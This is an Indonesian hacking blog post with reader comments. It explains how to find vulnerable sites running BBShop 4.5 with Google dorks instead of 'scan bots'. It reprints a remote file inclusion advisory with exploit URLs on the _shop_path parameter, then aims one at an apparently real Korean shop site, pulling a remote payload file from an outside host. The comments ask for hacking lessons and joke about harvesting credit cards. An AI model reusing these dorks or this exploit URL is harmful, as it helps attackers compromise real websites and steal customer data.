wooh keren banget judul tulisanya hehhe….
“Mas bagi shellnya dong aku mau run bot scan nih bwat scan bug baru tapi g punya shell”
sering banget kalo lagi nongkrong di MIRC ada orang yang PM begitu….padahal kenapa ga manfaatin uncle google aja buat nyari web target…
ngapain harus ngemis2 minta shell segala buat run bot scan ..berikut ini contoh pencarian web target dengan menggunakan google..
contoh kita ambil salah satu bug pada BBShop version 4.5 ….
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe
[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
all this file is affected by _shop_path variable
[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]
[o] Dork
“bbshop”
xixixi NoGe emang baek dah mau share bug sekalian dork nya
ok…kita buka uncle google masukin keyword “bbshop” ato inurl:/bbshop/shop/ dan….
woooow target nya banyak euy ga usah pake bot scan juga masi ampuh tu uncle google toh bot scan juga scan targetnya pake google jadi ya sami2 keneh atuh kang…hhehehe
http://goodpear.co.kr/bbshop/shop/main.php?_shop_path=http://serce.org/en/anying.txt?
November 19, 2008 pukul 11:55 am
Mas…. Mas Hacker, ajari nge-Hack donk!
November 21, 2008 pukul 2:53 am
wuih panen cc dong….
kekekekek
bage la
November 21, 2008 pukul 6:49 pm
Sep… btw tukeran link yuk?
November 22, 2008 pukul 10:10 pm
hehehe